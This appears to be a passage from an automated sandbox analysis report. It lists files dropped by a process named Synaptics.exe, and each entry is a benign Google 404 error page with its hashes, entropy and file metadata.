                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aEBS_vYctgO2mIAQBRcD8w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.259263379630682
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+079gSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Ai+pAZewRDK4mW
                                                                                                              MD5:DBD0155EC92010C092CB1FB3E46D2FDA
                                                                                                              SHA1:A53951D24DE28A1D6AD60524E4E92C9DAF3DC135
                                                                                                              SHA-256:0CB7B25575D41B9278789562448E9E72AB0A501EDF60A76A7DD9F7015B506CF8
                                                                                                              SHA-512:B73B54BA7FA99D5B7B14B323FD62A1F3184DD057BFC0FA0166BF58060AA87AD4A77B11A7EE9A00F637F36081BAB513F0D3ABF8E51A91E55C24D3A43AEB3D234E
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MsHLxSdaB0dNJUg9xuUfEw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.258270721857072
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0cSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/+pAZewRDK4mW
                                                                                                              MD5:9F9CB6839A4898040E1DFD5D2D72F9DC
                                                                                                              SHA1:73FAB8CEDE73BB2BAA83E08728444FA19CAB398A
                                                                                                              SHA-256:4BFB9A58660F4FA2B8C68B81C17EACF2723EF7954461AFECA4A24D2279C133B6
                                                                                                              SHA-512:EC2853B2B55BF9BF0D83C2BB3CB0127B3FC0D62411EFE29AC466C81C18CAA94BEFEA2256866DBDFB0416EC5493239543E8715BD186AEE73DDBA69551279DAAEB
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FrytZuqRiwEZzEj7s-bTDw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.268725977371007
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0sNCSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6+pAZewRDK4mW
                                                                                                              MD5:A575579F6D2DB594D2BC122D215EFA2C
                                                                                                              SHA1:A6FC2B70ACEF3033F9F5AB88FCAED52F80FF50E6
                                                                                                              SHA-256:82144CCCC4F0833BD04392571FCA01A49F1B0FF33DE9B0545DE69FFAA2171305
                                                                                                              SHA-512:8076904DDF916946FF065B89A48714E22C351709645E04F2EEAC8E2B2F45DA0E472FD0C284B2D4E7D0E92F177EEE05D1CB9B38E6087C691E5A0472117DB71A80
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4CPTXkGTtTH3U6IRmqfsrw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.273452833879324
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0HSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+M+pAZewRDK4mW
                                                                                                              MD5:D1CAC889D573ED07A56943C07C7B1C29
                                                                                                              SHA1:FD6DA5AF1088EA45AA3CBF94095B9FF9795852B7
                                                                                                              SHA-256:CD8970EB47566798D833AD11FD89573915B623C27E0FC5D5AACC59DAD41D27E7
                                                                                                              SHA-512:CA91FCFED4F37493ABC8CDF28D0175F90B4103A3B941C47FFD7FEA525E3371169A8C695EB05380641BA3A679791F7E3EFDFF30F1A722E75C75919D667161A48B
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5xWXjdhWBT5W-HSqVMbZXg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.271086932474392
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0DTpSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+gTp+pAZewRDK4mW
                                                                                                              MD5:0D44F71FECAA20AC9DDB2052168017CD
                                                                                                              SHA1:65482EB8264946D0D137282B992F0499A0B13F34
                                                                                                              SHA-256:26B5667062AAC81BF18D77944E761BE737DC0F94AF2821793F26F4CD3CE73D04
                                                                                                              SHA-512:E73A020558DD0FEBA607D09CF4C5CB3ADD1262014006CBBD2D25BA6EF562E5F96998F63B25A7C9D3952DC431D945A425E4E6A54CCC4A32577662272FDC3E93DF
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2RqG7jCIaFJJpCFYBrAhrw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.270826637562825
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0cjKSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+zjK+pAZewRDK4mW
                                                                                                              MD5:7464EEB956A92AE48AA23DE7EEE9F3ED
                                                                                                              SHA1:E8A5811F0443301A71DCE13578F5DC99AC76404D
                                                                                                              SHA-256:060E27F518CEA786E578D116C7ACD48C524941E880F68374DA96A3FC1F576FCC
                                                                                                              SHA-512:E2B45826DDEC175999A8A9E8E8B154D5AB24DA85463F963E66AA2BC55B2B48E17727CFF8E3B85E6A1013A478927F9F4E903B3810B99EE0D42BA2D6455D2FDBCA
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1FOzleRFUuEKF8zZ43YRdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.26157159040224
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                              MD5:6865F269C80F10A09612A7234AFEF5EF
                                                                                                              SHA1:A8CBB8769C912FC857445937CE1DBD46CC93E9E5
                                                                                                              SHA-256:1CD9CCE5541D534549151DB49CB83BDFCA2CBBA5CA1BE4C05C3E25091D0773CB
                                                                                                              SHA-512:9EBE77D9D14A6B0024E2EBC613923D8B418938B8FE0923F140396D1B7666B20B9CCFC6E36F5E6CD9C22050F208FC0C516009E263B78AF33F87DB0386C2F99923
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="D4zpQyUMsofxQ2HAXNl_bg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.261921698947657
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0BSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+G+pAZewRDK4mW
                                                                                                              MD5:34E6ECCA5F5E9B1A227ACB3A3FCA683E
                                                                                                              SHA1:9373ADAF38325C443BB9880573FD5E72089100B1
                                                                                                              SHA-256:7FDD1FF280E75BF284485710904CB3927976E8ACBDB8FED36C7E3F503AF366B0
                                                                                                              SHA-512:865E04A6A83FDE256064BC1F0BF525E3F72C4E493818CD55E560A460C21F37773F6D314D6A4AA0CEAC317E69AF9782E19E8BEAEAF0B4D21AB26F5CD1597B4D58
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rtKi2dPzQDegYReQdhSH6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.262183720109769
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0SSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9+pAZewRDK4mW
                                                                                                              MD5:53D85C159322745059FC3B98B640230F
                                                                                                              SHA1:A42393FD71DBE7A7C8E2994B4612762F4485DF2C
                                                                                                              SHA-256:D648471F2F6331184F43906F43653391397384E9B9BBD8A3AFFD8B78A26E31C7
                                                                                                              SHA-512:FF9A21F3AA6EAE18238D2B07B35DD4A4209E45AE1DD5727BDFAA1B8B47717CDEC4EA20C0BAC7FF51F1CD6249A9879D649E089A57E2C9E990B2FFAE9FDDBF5979
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TkT9mhDxaoXSdHr6DOoAwQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.264771629215864
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0daPzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+dPz+pAZewRDK4mW
                                                                                                              MD5:D02E0C108A5A77E1F6F0CCB9232EC940
                                                                                                              SHA1:F90834DD4A058E33FC97CC9AB33B4F9DFC9E6571
                                                                                                              SHA-256:08AD7A3CA039768DEA741817FBFCE5AAB9F880D20A5A81509994BD1191480AAB
                                                                                                              SHA-512:EE546641B494C03FC9779B6B1B284F2E30DD62E3756B69D8923FF99BF248D0F99D7E16987A30DBE952E1E1670C4BA55828544933C6D93C0F1FA08341FC70A4F1
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Xtw99tDLrzeTPPfkC3A0TA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.268081573066183
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0dTDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+a3+pAZewRDK4mW
                                                                                                              MD5:CF677909BF620ADBB721840731E8018B
                                                                                                              SHA1:90D2270F5D33E08A2C0926253E37102FDF486A10
                                                                                                              SHA-256:FE48B855AECB38B8E6F641BB018ECCEA4BCF14BE2C457D1A8BC7743E4F4E5F76
                                                                                                              SHA-512:488CFDAC6DF1A42EB65ED35FBE9A8B2DF2102241112CC69CA3D318C6A7B2890E5891879B242D3C43048AC1E0C010B031B2CDF0F7FB7C624CE9490504E7A6AE8B
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EbVWpk5u6VPn6HIw1gqG4A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.276262891918783
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0ilUbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Bqb+pAZewRDK4mW
                                                                                                              MD5:2FFF06713FFFE8F203F2F0A2AC7008F8
                                                                                                              SHA1:D88B7978197925E828367AB496CFE1B475110A29
                                                                                                              SHA-256:ECCCE11A2B145CFCC7F9788096E2160EA84F6BEEB3D394820107D452F0EEEB77
                                                                                                              SHA-512:BCA35EB0512FEB2E41D18051D48F54A5A35878BBF70180502D200841EAE7E5F793660AB3847B68D74DA6B0DA0DC6B52CF498DFE41C4C89FB707924F0AD3E0FB8
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="K-sGPSvtZBm6OXM3LvLuAg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.265339965707282
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0lkXXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/X+pAZewRDK4mW
                                                                                                              MD5:2416C4BDCDD55F876C0B47D61BFD1635
                                                                                                              SHA1:960C12B4B439359F5581683838CEABBDB4E82D84
                                                                                                              SHA-256:67BF49B3B912EF99ADF6CA200CCDBAA20242AC621662DBFD905DADC438617296
                                                                                                              SHA-512:A50BA29D2426485FFF1BA24AB89136F3C05FEA191A615995946971EFD064620746D2DF4C2601E449F62240D1F36D9C72FB7E7779924E7E98F57BAE255EEC4733
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QANsEN2mYtrJ3ZytdYNm6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.273976828320276
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+00DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+TD+pAZewRDK4mW
                                                                                                              MD5:ECEDE85F7DD4495097267443B1295D55
                                                                                                              SHA1:E78BB7ABFA48B54A46A7A029DB4C619387282D3D
                                                                                                              SHA-256:BC0F023DC0BE2C47C10F0771B9BAAAAA77A17131CDEC8EB75F71884E3454A46B
                                                                                                              SHA-512:174279DA1FCFE94A447B2C41430C516A7F77B431938196588C73DAFBF8D1750239AF62736A99719697B7555DF453B376EF6FC8FF8DC6E61A708B4E1AE8E7CB53
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="T93L_MKaFq1JOL5lJvIiHQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.258703860034481
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+01SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W+pAZewRDK4mW
                                                                                                              MD5:1E5F20ABBAA0EB53986A205934E72D21
                                                                                                              SHA1:7EBE8603E3E4F546004772FFD526FD4699EA2BBC
                                                                                                              SHA-256:4050CE864F0DA7E50E471B5CEBA1DCDE75BB9FB89DFE179A7191B8EA81382051
                                                                                                              SHA-512:544C6F1AC4F1DF2C2EB99D12DAC28BA4EC9A197AEE6A6438FB0B23BF123B1FFF4A6302FB5F494EA519AC3218DF118ED081D15AC579B3D55E5C374480B8583FAB
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IofL498iXSm_Pv9g_ZLvog">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
